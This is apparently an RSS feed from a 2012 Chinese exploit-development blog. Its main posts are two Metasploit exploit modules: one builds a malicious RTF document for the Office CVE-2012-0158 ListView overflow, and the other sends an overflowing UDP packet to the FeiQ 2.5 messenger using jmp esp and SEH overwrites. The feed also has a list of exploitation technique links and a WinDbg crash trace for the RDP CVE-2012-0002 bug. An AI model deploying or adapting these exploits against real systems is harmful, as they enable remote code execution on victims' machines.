<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CQ-CSER</title>
	<atom:link href="http://cq-cser.cn/feed/" rel="self" type="application/rss+xml" />
	<link>http://cq-cser.cn</link>
	<description>计算机爱好者</description>
	<lastBuildDate>Wed, 02 May 2012 10:01:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>simple version of 2012-0158</title>
		<link>http://cq-cser.cn/2012/05/simple-version-of-2012-0158/</link>
		<comments>http://cq-cser.cn/2012/05/simple-version-of-2012-0158/#comments</comments>
		<pubDate>Wed, 02 May 2012 10:01:39 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1573</guid>
		<description><![CDATA[前些日子写的。精简版 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
<li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
<li><a href='http://cq-cser.cn/2012/01/2012/' rel='bookmark' title='Permanent Link: 2012'>2012</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>前些日子写的。精简版<span id="more-1573"></span><br />
<code>##<br />
# This file is part of the Metasploit Framework and may be subject to<br />
# redistribution and commercial restrictions. Please see the Metasploit<br />
# web site for more information on licensing and terms of use.<br />
#   http://metasploit.com/<br />
##</p>
<p>require 'msf/core'</p>
<p>class Metasploit3 < Msf::Exploit::Remote<br />
	Rank = NormalRanking</p>
<p>	include Msf::Exploit::FILEFORMAT<br />
	include Msf::Exploit::Seh</p>
<p>	def initialize(info = {})<br />
		super(update_info(info,<br />
			'Name'           => 'office cve-2012-0158 ',<br />
			'Description'    => %q{<br />
					CVE-2012-0158 office version<br />
			},<br />
			'License'        => MSF_LICENSE,<br />
			'Author'         =><br />
				[<br />
					'XX ', # Original Exploit<br />
					'hellok', # MSF Module<br />
				],<br />
			'References'     =><br />
				[<br />
					[ 'EDB',  ]<br />
				],<br />
			'DefaultOptions'  =><br />
				{<br />
					'ExitFunction' => 'process',<br />
					'InitialAutoRunScript' => 'migrate -f',<br />
				},<br />
			'Platform'       => 'win',<br />
			'Payload'        =><br />
				{<br />
				   #'Space'           => 200,<br />
				   #'BadChars'        => "\x00\x0a\x0d\x1a\x80",<br />
				   #'DisableNops'     => true,<br />
				   #'StackAdjustment' => -3500,<br />
				},</p>
<p>			'Targets'        =><br />
				[<br />
					[ 'Windows XP',<br />
						{<br />
							'Ret'     => "\x2f\x49",<br />
							'Offset'  => 4102,<br />
							'Padding' => 1879<br />
						}<br />
					],<br />
					[ 'Windows 7',<br />
						{<br />
							'Ret'     => "\x2f\x49",<br />
							'Offset'  => 4102,<br />
							'Padding' => 1931<br />
						}<br />
					],<br />
				],<br />
			'Privileged'     => false,<br />
			'DisclosureDate' => '',<br />
			'DefaultTarget'  => 0))</p>
<p>		register_options(<br />
			[<br />
				OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf']),<br />
			], self.class)</p>
<p>	end</p>
<p>	def exploit</p>
<p>		head1="{\\rtf1<br />
{\\object\\objocx<br />
{\\*\\objdata<br />
01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E32000000000000000000000E0000<br />
D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F028362800000000ab9bDFB9340DCD018c49DFB9340DCD01030<br />
00000000600000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000003004F00430058004E0041004D004500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000160000000000000043006F006E00740065006E007400730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000020000007E05000000000000FEFFFFFFFEFFFFFF030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF009203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004C0069007300740056006900650077004100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002143341208000000a50A0000050500004E087DEB010006001C000000000000000000000000060001560A000001EFCDAB00000500985D6501070000000800008005000080000000000000000000000000000000001FDEECBD010005009017190000000800000049746D7364<br />
"<br />
		head2="00000002000000010000000C000000436F626A640000004141000041410000000000000000000000000000"<br />
		jmp_esp="1245fa7f"<br />
		buffer="909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"<br />
		head4="000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br />
}<br />
}<br />
}"<br />
		print_status("buffer.length:#{buffer.length}")<br />
		if payload.encoded.length >  buffer.length<br />
			print_status("Shellcode too long")<br />
		else<br />
			payload_buf = ''<br />
			payload_buf << payload.encoded<br />
			escaped_payload = Rex::Text.to_hex(payload_buf, prefix = "", count = 1)#to_unescape to_hex_ascii to_unicode hex_to_raw to_hex_dump<br />
			buffer[16,escaped_payload.length]=escaped_payload<br />
			print_status("escaped_payload.length:#{escaped_payload.length}")<br />
			head1<<head2<br />
			head1<<jmp_esp<br />
			head1<<buffer<br />
			head1<<head4<br />
			file_create(head1)<br />
		end</p>
<p>	end<br />
end<br />
</code></p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
<li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
<li><a href='http://cq-cser.cn/2012/01/2012/' rel='bookmark' title='Permanent Link: 2012'>2012</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/05/simple-version-of-2012-0158/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>feiq2008.2.5.0.0</title>
		<link>http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/</link>
		<comments>http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/#comments</comments>
		<pubDate>Sat, 07 Apr 2012 19:20:36 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1565</guid>
		<description><![CDATA[星期6的夜晚总是让人想到很多东西 调了下飞秋2.5.0.0测试版 可惜室友的64位WIN7没弹计算器。msf代码如下 下载地址 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>星期6的夜晚总是让人想到很多东西<br />
调了下飞秋2.5.0.0测试版<br />
可惜室友的64位WIN7没弹计算器。msf代码如下<br />
<span id="more-1565"></span><br />
<a href="http://www.feiq18.com/forum.php?mod=viewthread&#038;tid=4610&#038;extra=page%3D1">下载地址</a><br />
<code>##<br />
# This file is part of the Metasploit Framework and may be subject to<br />
# redistribution and commercial restrictions. Please see the Metasploit<br />
# Framework web site for more information on licensing and terms of use.<br />
#   http://metasploit.com/framework/<br />
##</p>
<p>require 'msf/core'</p>
<p>class Metasploit3 < Msf::Exploit::Remote<br />
	#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking<br />
	#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking<br />
	Rank = NormalRanking</p>
<p>	include Msf::Exploit::Remote::Udp<br />
	include Msf::Exploit::Remote::Seh</p>
<p>	def initialize(info = {})<br />
		super(update_info(info,<br />
			'Name'		=> 'feiQ2.5 remote buffer overflow',<br />
			'Description'	=> %q{<br />
					Provide information about the vulnerability / explain as good as you can<br />
					Make sure to keep each line less than 100 columns wide<br />
					0049D04E  |.  F3:A5         rep movs dword ptr es:[edi],dword ptr ds:[esi]      ;<br />
			},<br />
			'License'		=> MSF_LICENSE,<br />
			'Author'		=><br />
				[<br />
					'insert_name_of_person_who_discovered_the_vulnerability<user[at]domain.com>',	# Original discovery<br />
					'hellok',	# MSF Module<br />
				],<br />
			'References'	=><br />
				[<br />
					[ 'OSVDB', '<insert OSVDB number here>' ],<br />
					[ 'CVE', 'insert CVE number here' ],<br />
					[ 'URL', '<insert another link to the exploit/advisory here>' ]<br />
				],<br />
			'DefaultOptions' =><br />
				{<br />
					'ExitFunction' => 'process', #none/process/thread/seh<br />
					#'InitialAutoRunScript' => 'migrate -f',<br />
				},<br />
			'Platform'	=> 'win',<br />
			'Payload'	=><br />
				{<br />
					'BadChars' => "", # <change if needed><br />
					'DisableNops' => true,<br />
				},</p>
<p>			'Targets'		=><br />
				[<br />
					[ 'WIN7',<br />
						{<br />
							'Ret'   	=>	0x0050511e,#{pivot 1484}  # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,5C8 # RETN<br />
							'Offset'	=>	0<br />
						}<br />
					],<br />
				],<br />
			'Privileged'	=> false,<br />
			#Correct Date Format: "M D Y"<br />
			#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec<br />
			'DisclosureDate'	=> 'MONTH DAY YEAR',<br />
			'DefaultTarget'	=> 0))</p>
<p>		register_options([Opt::RPORT(2425)], self.class)</p>
<p>	end</p>
<p>	def exploit</p>
<p>		connect_udp</p>
<p>        print_status("Trying target #{target.name}...")</p>
<p>		header  = "1_lbt4_1#65664#6CF04987CC1A#570#31741#2147483648#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:"<br />
		jmp_esp = "\x12\x45\xfa\x7f" #0x7FFA4512 jmp esp<br />
		padding="0"<br />
		packet = "\x90"*7474<br />
        packet[0,header.length] = header<br />
		packet[408,8] = jmp_esp<br />
		packet[408+8+8,payload.encoded.length] = payload.encoded<br />
		packet << padding<br />
		packet << [target.ret].pack("V") #SEH<br />
		packet << [target.ret].pack("V") #SEH FUNC</p>
<p>		print_status("Trying target #{target.name}...")</p>
<p>		udp_sock.put(packet)</p>
<p>        handler<br />
        disconnect_udp</p>
<p>	end<br />
end<br />
</code></p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
<li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>利用技术整理</title>
		<link>http://cq-cser.cn/2012/03/%e5%88%a9%e7%94%a8%e6%8a%80%e6%9c%af%e6%95%b4%e7%90%86/</link>
		<comments>http://cq-cser.cn/2012/03/%e5%88%a9%e7%94%a8%e6%8a%80%e6%9c%af%e6%95%b4%e7%90%86/#comments</comments>
		<pubDate>Tue, 20 Mar 2012 05:52:09 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1559</guid>
		<description><![CDATA[1.LINUX空指针引用 2.写00地址 //TODO PDF: 数据流： http://www.ccf.org.cn/sites/ccf/weekly/papers/王铁磊1.pdf flash: aslr bypass http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf   http://kernelfun.blogspot.com/ http://browserfun.blogspot.com/ http://projects.info-pull.com/mokb/ http://www.abysssec.com/blog/2010/09/01/moaub-1/ Related posts:android-adb-shell-cookie Blogs, Feeds, Guides &#038; Links[zz]


Related posts:<ol><li><a href='http://cq-cser.cn/2011/01/android-adb-shell-cookie/' rel='bookmark' title='Permanent Link: android-adb-shell-cookie'>android-adb-shell-cookie</a></li>
<li><a href='http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/' rel='bookmark' title='Permanent Link: Blogs, Feeds, Guides &#038; Links[zz]'>Blogs, Feeds, Guides &#038; Links[zz]</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>1.<a href="http://www.80vul.com/webzine_0x05/0x09%20Exploit%20Linux%20Kernel%20Slub%20Overflow.html">LINUX空指针引用</a><br /> 2.写00地址<br /> //TODO</p>
<p><span id="more-1559"></span></p>
<p>PDF:<br /> 数据流：<br /> http://www.ccf.org.cn/sites/ccf/weekly/papers/王铁磊1.pdf</p>
<p>flash:</p>
<p>aslr bypass</p>
<p><a href="http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf">http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf</a></p>
<p> </p>
<p><a href="http://kernelfun.blogspot.com/">http://kernelfun.blogspot.com/</a></p>
<p><a href="http://browserfun.blogspot.com/">http://browserfun.blogspot.com/</a></p>
<p><a href="http://projects.info-pull.com/mokb/">http://projects.info-pull.com/mokb/</a></p>
<p><a href="http://www.abysssec.com/blog/2010/09/01/moaub-1/">http://www.abysssec.com/blog/2010/09/01/moaub-1/</a></p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/01/android-adb-shell-cookie/' rel='bookmark' title='Permanent Link: android-adb-shell-cookie'>android-adb-shell-cookie</a></li>
<li><a href='http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/' rel='bookmark' title='Permanent Link: Blogs, Feeds, Guides &#038; Links[zz]'>Blogs, Feeds, Guides &#038; Links[zz]</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2012/03/%e5%88%a9%e7%94%a8%e6%8a%80%e6%9c%af%e6%95%b4%e7%90%86/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2012-0002</title>
		<link>http://cq-cser.cn/2012/03/2012-0002/</link>
		<comments>http://cq-cser.cn/2012/03/2012-0002/#comments</comments>
		<pubDate>Wed, 14 Mar 2012 16:18:22 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[其他]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1550</guid>
		<description><![CDATA[更新： 写一个可靠地POC真的很有挑战，有兴趣的周末有空可以试试 同时看到个PYTHON的POChere,什么叫“chinese shit”,那不是一个文明人应该说的话。 ANOTHER POC Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Windows\Minidump\031512-48641-01.dmp] Mini Kernel Dump File: Only registers and stack trace are available Symbol search path is: SRV*c:\sym*http://msdl.microsoft.com/download/symbols Executable search path is: Windows 7 Kernel Version 7600 MP (2 procs) Free x86 compatible [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2012/01/2012/' rel='bookmark' title='Permanent Link: 2012'>2012</a></li>
<li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2011/10/darungrim/' rel='bookmark' title='Permanent Link: darungrim'>darungrim</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>更新：<br />
写一个可靠地POC真的很有挑战，有兴趣的周末有空可以试试</p>
<p>同时看到个PYTHON的POC<a href="http://pastebin.com/UzDKcCQy">here</a>,什么叫“chinese shit”,那不是一个文明人应该说的话。</p>
<p><a href="http://blog.binaryninjas.org/?p=58">ANOTHER POC</a></p>
<p><span id="more-1550"></span>
<p>
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86<br />
Copyright (c) Microsoft Corporation. All rights reserved.</p>
<p>Loading Dump File [C:\Windows\Minidump\031512-48641-01.dmp]<br />
Mini Kernel Dump File: Only registers and stack trace are available</p>
<p>Symbol search path is: SRV*c:\sym*http://msdl.microsoft.com/download/symbols<br />
Executable search path is:<br />
Windows 7 Kernel Version 7600 MP (2 procs) Free x86 compatible<br />
Product: WinNt, suite: TerminalServer SingleUserTS<br />
Built by: 7600.16905.x86fre.win7_gdr.111025-1503<br />
Machine Name:<br />
Kernel base = 0&#215;84813000 PsLoadedModuleList = 0x8495b810<br />
Debug session time: Thu Mar 15 00:09:37.977 2012 (UTC + 8:00)<br />
System Uptime: 0 days 4:51:31.285<br />
Loading Kernel Symbols<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<br />
&#8230;&#8230;<br />
Loading User Symbols<br />
Loading unloaded module list<br />
&#8230;&#8230;&#8230;<br />
*******************************************************************************<br />
*                                                                             *<br />
*                        Bugcheck Analysis                                    *<br />
*                                                                             *<br />
*******************************************************************************</p>
<p>Use !analyze -v to get detailed debugging information.</p>
<p>BugCheck 1000008E, {c0000005, 939a0987, b43d9804, 0}</p>
<p>*** WARNING: Unable to verify timestamp for Hookport.sys<br />
*** ERROR: Module load completed but symbols could not be loaded for Hookport.sys<br />
Probably caused by : termdd.sys ( termdd!IcaBufferAllocEx+1b )</p>
<p>Followup: MachineOwner<br />
&#8212;&#8212;&#8212;</p>
<p>1: kd> k<br />
ChildEBP RetAddr<br />
b43d9884 a4a11232 termdd!IcaBufferAllocEx+0x1b<br />
b43d98a4 a4a2b405 RDPWD!WDICART_IcaBufferAllocEx+0&#215;24<br />
b43d98c8 a4a2b46e RDPWD!StackBufferAllocEx+0x5c<br />
b43d98f4 a4a1c722 RDPWD!MCSDetachUserRequest+0&#215;29<br />
b43d9908 a4a170ff RDPWD!NMDetachUserReq+0&#215;14<br />
b43d9914 a4a1666c RDPWD!NM_Disconnect+0&#215;16<br />
b43d9920 a4a1c821 RDPWD!SM_Disconnect+0&#215;27<br />
b43d9930 a4a1c762 RDPWD!SM_OnConnected+0&#215;70<br />
b43d9950 a4a174d3 RDPWD!NMAbortConnect+0&#215;23<br />
b43d9990 a4a16f3c RDPWD!NM_Connect+0&#215;68<br />
b43d99b0 a4a14f64 RDPWD!SM_Connect+0x11d<br />
b43d99ec a4a15764 RDPWD!WDWConnect+0&#215;557<br />
b43d9a28 a4a108df RDPWD!WDLIB_TShareConfConnect+0xa0<br />
b43d9a3c 939a45f1 RDPWD!WDSYS_Ioctl+0x6c9<br />
b43d9a58 939a4aa9 termdd!_IcaCallSd+0&#215;37<br />
